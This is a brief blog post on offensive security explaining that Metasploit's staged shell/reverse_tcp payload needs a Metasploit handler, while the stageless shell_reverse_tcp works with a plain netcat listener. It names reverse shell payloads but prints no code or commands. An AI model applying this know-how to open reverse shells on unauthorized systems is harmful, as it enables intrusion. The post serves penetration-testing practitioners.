Only use a stager if there is a stage to perform on – shell/reverse_tcp vs. shell_reverse_tcp

Hi,

just a quicky:

(If you don’t know what this is about maybe you want to brush up your knowlege in offensive security)

If you need to generate a simple reverse shell payload with metasploit (msfpayload | msfencode) be aware of the difference between shell/reverse_tcp and shell_reverse_tcp!

shell/reverse_tcp is just a stager that connects back to metasploit and loads the actual payload (shellcode)! So if you are sitting in front of your netcat listener the stager will miss its intended stage and will not perform a pretty act (a shell) for you…

If you are just using msfpayload you will see a splitted output (Stage 1+2) that will remind you. However if you pipe directly into msfencode then you will get no feedback in the output!

You can also look at the rapid7 module listing:
https://www.rapid7.com/db/modules/payload/linux/x86/shell_reverse_tcp
https://www.rapid7.com/db/modules/payload/linux/x86/shell/reverse_tcp

Regards
Sebastian

Advertisements

About SebastianB

read it in my blog
This entry was posted in InfoSec and tagged , , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s